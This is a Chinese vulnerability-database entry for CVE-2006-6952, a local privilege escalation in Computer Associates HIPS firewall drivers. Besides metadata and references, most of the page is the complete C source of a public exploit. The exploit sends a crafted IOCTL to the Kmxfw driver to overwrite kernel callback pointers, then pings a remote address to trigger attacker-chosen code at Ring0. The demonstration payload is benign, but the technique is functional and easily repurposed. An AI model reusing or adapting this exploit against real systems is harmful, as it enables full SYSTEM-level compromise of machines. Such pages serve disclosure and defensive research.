CA多个产品驱动本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111568 漏洞类型 设计错误
发布时间 2006-11-16 更新时间 2007-01-25
CVE编号 CVE-2006-6952 CNNVD-ID CNNVD-200701-407
漏洞平台 Windows CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/29069
https://www.securityfocus.com/bid/21140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-407
|漏洞详情
ComputerAssociates是世界领先的安全厂商,产品包括多种杀毒软件及备份恢复系统。CAHIPS产品的驱动在实现上存在问题,本地攻击者可能利用此漏洞提升权限。CA的HIPSCore(KmxStart.sys)和HIPSFirewall(KmxFw.sys)驱动hook了TDI和NDIS。本地非特权用户可以使用一些特权IOCTL覆盖这些驱动中的函数指针,以Ring0权限执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/21140/info

Multiple Computer Associates security-related products are prone to multiple local privilege-escalation vulnerabilities.

An attacker can leverage these issues to execute arbitrary code with SYSTEM-level privileges. This could result in the complete compromise of vulnerable computers.

These isses affect CA Personal Firewall 2007 (v9.0) Engine version 1.0.173 and prior and CA Internet Security Suite 2007 version 3.0 with CA Personal Firewall 2007 version 9.0 Engine version 1.0.173 and prior.

////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
//// Kmxfw.sys
//// Kernel Privilege Escalation #2
//// Exploit
//// Rub�n Santamarta 
//// www.reversemode.com
//// 15/10/2006
//// ONLY FOR EDUCATION PURPOSES
//// NO MODIFICATION ALLOWED.
////////////////////////////////////
/////////////////////
/// Compiling:
/// gcc exploit.c -o exploit -lwsock32
/////////////////////


#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#include <iphlpapi.h>


typedef HANDLE (WINAPI *PIcmpCreateFile)();
typedef DWORD (WINAPI *PIcmpSendEcho2)(   HANDLE IcmpHandle,
                                          HANDLE Event,
                                          FARPROC ApcRoutine,
                                          PVOID ApcContext,
                                          IPAddr DestinationAddress,
                                          LPVOID RequestData,
                                          WORD RequestSize,
                                          PIP_OPTION_INFORMATION RequestOptions,
                                          LPVOID ReplyBuffer,
                                          DWORD ReplySize,
                                          DWORD Timeout);

VOID Ring0Function()
{

 printf("\n");
 printf("-----[RING0]------");
 printf("\n");
 printf("[*] Message: [.oO Hello From Ring0! Oo.]\n");
 printf("[!] Exploit Terminated\n");
 printf("-----[RING0]------");
 Sleep(50000);
}

VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

int main(int argc, char *argv[])
{

 DWORD				*OutBuff,*InBuff;
 DWORD              CallBacks[4];			
 DWORD				dwIOCTL,OutSize,InSize,junk,i,dwRetVal;
 HANDLE				hDevice;
 PIcmpSendEcho2     IcmpSendEcho2;
 PIcmpCreateFile    IcmpCreateFile;
 LPVOID             ReplyBuffer;
 HANDLE             hIcmpFile;
 char               *SendData = "owned!";


  
 if(argc<2)
 {
  printf("\nusage> exploit.exe  2K or XP\n");
  exit(1);
 }

 if(!strcmp(argv[1],"2K")) 
 {
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
													,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
                                                  ,"IcmpCreateFile");
 }                          
 else                        
{
  IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
													,"IcmpSendEcho2");
  IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
                                                 ,"IcmpCreateFile");
}
 
system("cls");
printf("############################\n");
printf("### CA Personal Firewall ###\n");
printf("##### - Ring0 Exploit - ####\n");
printf("############################\n");
printf("Ruben Santamarta\nwww.reversemode.com\n\n");
//////////////////////
///// CASE 'DosDevice'
//////////////////////

hDevice = CreateFile("\\\\.\\Kmxfw",
                     0,
                     0,
                     NULL,
                     3,
                     0,
                     0);

//////////////////////
///// INFO 
//////////////////////

 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[!] Kmxfw Device Handle [%x]\n",hDevice);
 
//////////////////////
///// BUFFERS
//////////////////////
 OutSize = 0x44;

 OutBuff = (DWORD *)malloc(OutSize);
 //////////////////////
 ///// IOCTL
 //////////////////////

 dwIOCTL = 0x85000014;
 printf("[!] Injecting Malicious Callback\n",dwIOCTL);
 CallBacks[0]=0;
 CallBacks[1]=(DWORD)Ring0Function;
 CallBacks[2]=0;
 
 OutBuff[0]=(DWORD)CallBacks;
 OutBuff[1]=(DWORD)CallBacks;
 OutBuff[2]=(DWORD)CallBacks;
 
 
 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 (LPVOID)OutBuff,0x10,
                 (LPVOID)OutBuff,0x44,
                 &junk,  
                 NULL);
 
 printf("[!] Pinging google\n\t->Executing Ring0 Function\n");
 hIcmpFile=IcmpCreateFile();
 ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
 IcmpSendEcho2(hIcmpFile,
                    NULL,
                    NULL,
                    NULL,
                    inet_addr("66.102.9.99"), 
                    SendData, 
                    sizeof(SendData),
                    NULL,
                    ReplyBuffer, 
                    8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
                    1000);

 
}
|受影响的产品
Computer Associates Personal Firewall 9.0 Computer Associates Internet Security Suite 2007 3.0 Computer Associates Internet Security Suite 2007 0
|参考资料

来源:BID
名称:21140
链接:http://www.securityfocus.com/bid/21140
来源:BUGTRAQ
名称:20061116[Reversemodeadvisory]ComputerAssociatesHIPSDrivers-multiplelocalprivilegeescalationvulnerabilities.
链接:http://www.securityfocus.com/archive/1/archive/1/451952/100/0/threaded
来源:BUGTRAQ
名称:20061121RE:[Reversemodeadvisory]ComputerAssociatesHIPSDrivers-multiplelocalprivilegeescalationvulnerabilities.
链接:http://www.securityfocus.com/archive/1/452286/100/0/threaded
来源:MISC
链接:http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=38
来源:SECUNIA
名称:22972
链接:http://secunia.com/advisories/22972
来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34818
来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97729
来源:BUGTRAQ
名称:20070124[CAID34818]:CAPersonalFirewallMultiplePrivilegeEscalationVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/458040/100/200/threaded
来源:OSVDB
名称:30498
链接:http://www.osvdb.org/30498
来源:OSVDB